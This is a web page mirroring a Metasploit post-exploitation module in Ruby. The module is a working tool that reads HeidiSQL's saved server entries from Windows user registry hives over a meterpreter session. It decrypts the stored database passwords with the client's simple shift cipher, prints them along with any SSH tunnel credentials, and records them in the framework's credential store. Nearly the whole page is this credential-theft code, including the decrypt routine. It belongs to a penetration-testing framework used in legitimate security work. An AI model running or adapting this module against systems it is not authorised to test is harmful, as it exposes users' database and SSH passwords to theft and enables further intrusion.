Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/gather/credentials/heidisql.rb
19758 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::Windows::Registry

8
  include Msf::Auxiliary::Report

9
  include Msf::Post::Windows::UserProfiles

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Windows Gather HeidiSQL Saved Password Extraction',

16
        'Description' => %q{

17
          This module extracts saved passwords from the HeidiSQL client. These

18
          passwords are stored in the registry. They are encrypted with a custom algorithm.

19
          This module extracts and decrypts these passwords.

20
        },

21
        'License' => MSF_LICENSE,

22
        'Author' => ['h0ng10'],

23
        'Platform' => [ 'win' ],

24
        'SessionTypes' => [ 'meterpreter' ],

25
        'Notes' => {

26
          'Stability' => [CRASH_SAFE],

27
          'SideEffects' => [],

28
          'Reliability' => []

29
        }

30
      )

31
    )

32
  end

33


34
  def print_status(msg = '')

35
    super("#{peer} - #{msg}")

36
  end

37


38
  def print_error(msg = '')

39
    super("#{peer} - #{msg}")

40
  end

41


42
  def print_good(msg = '')

43
    super("#{peer} - #{msg}")

44
  end

45


46
  def run

47
    userhives = load_missing_hives

48
    userhives.each do |hive|

49
      next if hive['HKU'].nil?

50


51
      print_status("Looking at Key #{hive['HKU']}")

52
      begin

53
        subkeys = registry_enumkeys("#{hive['HKU']}\\Software\\HeidiSQL\\Servers")

54
        if subkeys.blank?

55
          print_status('HeidiSQL not installed for this user.')

56
          next

57
        end

58


59
        service_types = {

60
          0 => 'mysql',

61
          1 => 'mysql-named-pipe',

62
          2 => 'mysql-ssh',

63
          3 => 'mssql-named-pipe',

64
          4 => 'mssql',

65
          5 => 'mssql-spx-ipx',

66
          6 => 'mssql-banyan-vines',

67
          7 => 'mssql-windows-rpc',

68
          8 => 'postgres'

69
        }

70


71
        subkeys.each do |site|

72
          site_key = "#{hive['HKU']}\\Software\\HeidiSQL\\Servers\\#{site}"

73
          host = registry_getvaldata(site_key, 'Host') || ''

74
          user = registry_getvaldata(site_key, 'User') || ''

75
          port = registry_getvaldata(site_key, 'Port') || ''

76
          db_type = registry_getvaldata(site_key, 'NetType') || ''

77
          prompt = registry_getvaldata(site_key, 'LoginPrompt') || ''

78
          ssh_user = registry_getvaldata(site_key, 'SSHtunnelUser') || ''

79
          ssh_host = registry_getvaldata(site_key, 'SSHtunnelHost') || ''

80
          ssh_port = registry_getvaldata(site_key, 'SSHtunnelPort') || ''

81
          ssh_pass = registry_getvaldata(site_key, 'SSHtunnelPass') || ''

82
          win_auth = registry_getvaldata(site_key, 'WindowsAuth') || ''

83
          epass = registry_getvaldata(site_key, 'Password')

84


85
          # skip if windows authentication is used (mssql only)

86
          next if db_type.between?(3, 7) && (win_auth == 1)

87
          next if epass.nil? || (epass == '') || (epass.length == 1) || (prompt == 1)

88


89
          pass = decrypt(epass)

90
          print_good("Service: #{service_types[db_type]} Host: #{host} Port: #{port} User: #{user}  Password: #{pass}")

91


92
          service_data = {

93
            address: host == '127.0.0.1' ? rhost : host,

94
            port: port,

95
            service_name: service_types[db_type],

96
            protocol: 'tcp',

97
            workspace_id: myworkspace_id

98
          }

99


100
          credential_data = {

101
            origin_type: :session,

102
            session_id: session_db_id,

103
            post_reference_name: refname,

104
            private_type: :password,

105
            private_data: pass,

106
            username: user

107
          }

108


109
          credential_data.merge!(service_data)

110


111
          # Create the Metasploit::Credential::Core object

112
          credential_core = create_credential(credential_data)

113


114
          # Assemble the options hash for creating the Metasploit::Credential::Login object

115
          login_data = {

116
            core: credential_core,

117
            status: Metasploit::Model::Login::Status::UNTRIED

118
          }

119


120
          # Merge in the service data and create our Login

121
          login_data.merge!(service_data)

122
          create_credential_login(login_data)

123


124
          # if we have a MySQL via SSH connection, we need to store the SSH credentials as well

125
          next unless db_type == 2

126


127
          print_good("Service: ssh Host: #{ssh_host} Port: #{ssh_port} User: #{ssh_user}  Password: #{ssh_pass}")

128


129
          service_data = {

130
            address: ssh_host,

131
            port: ssh_port,

132
            service_name: 'ssh',

133
            protocol: 'tcp',

134
            workspace_id: myworkspace_id

135
          }

136


137
          credential_data = {

138
            origin_type: :session,

139
            session_id: session_db_id,

140
            post_reference_name: refname,

141
            private_type: :password,

142
            private_data: ssh_pass,

143
            username: ssh_user

144
          }

145


146
          credential_data.merge!(service_data)

147


148
          # Create the Metasploit::Credential::Core object

149
          credential_core = create_credential(credential_data)

150


151
          # Assemble the options hash for creating the Metasploit::Credential::Login object

152
          login_data = {

153
            core: credential_core,

154
            status: Metasploit::Model::Login::Status::UNTRIED

155
          }

156


157
          # Merge in the service data and create our Login

158
          login_data.merge!(service_data)

159
          create_credential_login(login_data)

160
        end

161
      rescue ::Rex::Post::Meterpreter::RequestError => e

162
        elog(e)

163
        print_error("Cannot Access User SID: #{hive['HKU']} : #{e.message}")

164
      end

165
    end

166
    unload_our_hives(userhives)

167
  end

168


169
  def decrypt(encoded)

170
    decoded = ''

171
    shift = Integer(encoded[-1, 1])

172
    encoded = encoded[0, encoded.length - 1]

173


174
    hex_chars = encoded.scan(/../)

175
    hex_chars.each do |entry|

176
      x = entry.to_i(16) - shift

177
      decoded += x.chr(::Encoding::UTF_8)

178
    end

179


180
    return decoded

181
  end

182
end

183


184